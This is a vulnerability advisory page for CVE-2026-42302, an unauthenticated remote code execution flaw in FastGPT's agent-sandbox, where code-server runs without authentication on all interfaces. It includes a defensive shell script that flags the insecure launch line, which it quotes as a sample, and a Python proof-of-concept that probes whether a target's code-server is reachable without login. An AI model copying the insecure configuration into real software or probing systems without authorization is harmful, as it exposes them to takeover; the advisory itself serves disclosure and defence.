Security Vulnerability Report
CVE-2026-42302 CVSS 9.8 CRITICAL

Published: 2026-05-08 23:16:37
Last Modified: 2026-05-08 23:16:37

Description

FastGPT is an AI Agent building platform. From version 4.14.10 to before version 4.14.13, the agent-sandbox component of FastGPT is vulnerable to unauthenticated Remote Code Execution (RCE). The startup script entrypoint.sh initializes code-server with the --auth none flag and binds the service to all network interfaces (0.0.0.0:8080). This configuration allows any user with network access to the port to bypass authentication and gain full control over the sandbox environment. This issue has been patched in version 4.14.13.
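The two settings the description names are both startup-time choices, so the cheapest control is to audit the launch line before the container ships. The script below is an added example, not FastGPT's entrypoint.sh and not part of the advisory: it checks a code-server command line for the weak combination described above (authentication disabled and the listener bound to every interface) and shows a hardened form beside it. The hardened invocation assumes code-server's own --auth password mode, which reads the password from the PASSWORD or HASHED_PASSWORD environment variable, and a loopback bind so that only a local proxy or sidecar can reach the IDE; the sample command lines are constructed for the example.

```shell
#!/bin/sh
# Added example (not FastGPT code): audit a code-server launch line for the
# weak settings described in CVE-2026-42302 and show a hardened alternative.

# Constructed sample in the shape the advisory describes: no auth, all interfaces.
WEAK_CMD='code-server --auth none --bind-addr 0.0.0.0:8080 /workspace'

# Hardened form (assumption: password auth via PASSWORD/HASHED_PASSWORD env,
# listener on loopback only; a reverse proxy or sidecar fronts it if needed).
HARDENED_CMD='code-server --auth password --bind-addr 127.0.0.1:8080 /workspace'

# audit_code_server_cmd "<command line>"
# Prints one FINDING line per weak setting. Returns 0 when clean, 1 otherwise.
audit_code_server_cmd() {
  cmd=" $1 "
  findings=0

  # Finding 1: authentication switched off entirely.
  case "$cmd" in
    *" --auth none "*|*" --auth=none "*)
      echo "FINDING: authentication disabled (--auth none)"
      findings=$((findings + 1))
      ;;
  esac

  # Finding 2: bound to all IPv4 or IPv6 interfaces (code-server's default
  # without --bind-addr is 127.0.0.1:8080, so an absent flag is not flagged).
  case "$cmd" in
    *" --bind-addr 0.0.0.0:"*|*" --bind-addr=0.0.0.0:"*|\
    *" --bind-addr [::]:"*|*" --bind-addr=[::]:"*)
      echo "FINDING: listener bound to all interfaces"
      findings=$((findings + 1))
      ;;
  esac

  [ "$findings" -eq 0 ]
}

# Stand-alone run: audit both sample lines and report.
echo "--- weak launch line ---"
audit_code_server_cmd "$WEAK_CMD" || echo "result: NOT OK (fix before shipping the image)"
echo "--- hardened launch line ---"
audit_code_server_cmd "$HARDENED_CMD" && echo "result: OK"
```

Run it as part of the image build or a CI lint over the sandbox's entrypoint; a non-zero exit from audit_code_server_cmd is the signal to block the build. The same two patterns are what a reviewer should look for when a PR touches the sandbox startup script.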

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available yet; the affected range below is taken from the description.

FastGPT >= 4.14.10
FastGPT < 4.14.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Proof of Concept for CVE-2026-42302
# Checks if the code-server is accessible without authentication

target = "http://<target-ip>:8080"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
}


def check_vulnerability():
    try:
        # Accessing the root endpoint of code-server
        response = requests.get(target, headers=headers, timeout=5)
        # If auth is none, it usually returns 200 or 302 to the IDE interface
        # Check for specific content indicating code-server is running
        if response.status_code == 200 and "code-server" in response.text:
            print("[+] Target is vulnerable to CVE-2026-42302.")
            print("[+] Code-server is accessible without authentication.")
            print("[+] RCE possible via Web Terminal at: {}".format(target))
        else:
            print("[-] Target does not appear to be vulnerable or service is down.")
    except requests.RequestException as e:
        print("[-] Connection error: {}".format(e))


if __name__ == "__main__":
    check_vulnerability()

References

https://github.com/labring/FastGPT/commit/9d1cafce9241430fb5bcdd646455055c5f4ae0a4
https://github.com/labring/FastGPT/pull/6781
https://github.com/labring/FastGPT/releases/tag/v4.14.13
https://github.com/labring/FastGPT/security/advisories/GHSA-34rc-438g-7w78

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42302", "sourceIdentifier": "[email protected]", "published": "2026-05-08T23:16:36.640", "lastModified": "2026-05-08T23:16:36.640", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "FastGPT is an AI Agent building platform. From version 4.14.10 to before version 4.14.13, the agent-sandbox component of FastGPT is vulnerable to unauthenticated Remote Code Execution (RCE). The startup script entrypoint.sh initializes code-server with the --auth none flag and binds the service to all network interfaces (0.0.0.0:8080). This configuration allows any user with network access to the port to bypass authentication and gain full control over the sandbox environment. This issue has been patched in version 4.14.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/labring/FastGPT/commit/9d1cafce9241430fb5bcdd646455055c5f4ae0a4", "source": "[email protected]"}, {"url": "https://github.com/labring/FastGPT/pull/6781", "source": "[email protected]"}, {"url": "https://github.com/labring/FastGPT/releases/tag/v4.14.13", "source": "[email protected]"}, {"url": "https://github.com/labring/FastGPT/security/advisories/GHSA-34rc-438g-7w78", "source": "[email protected]"}]}}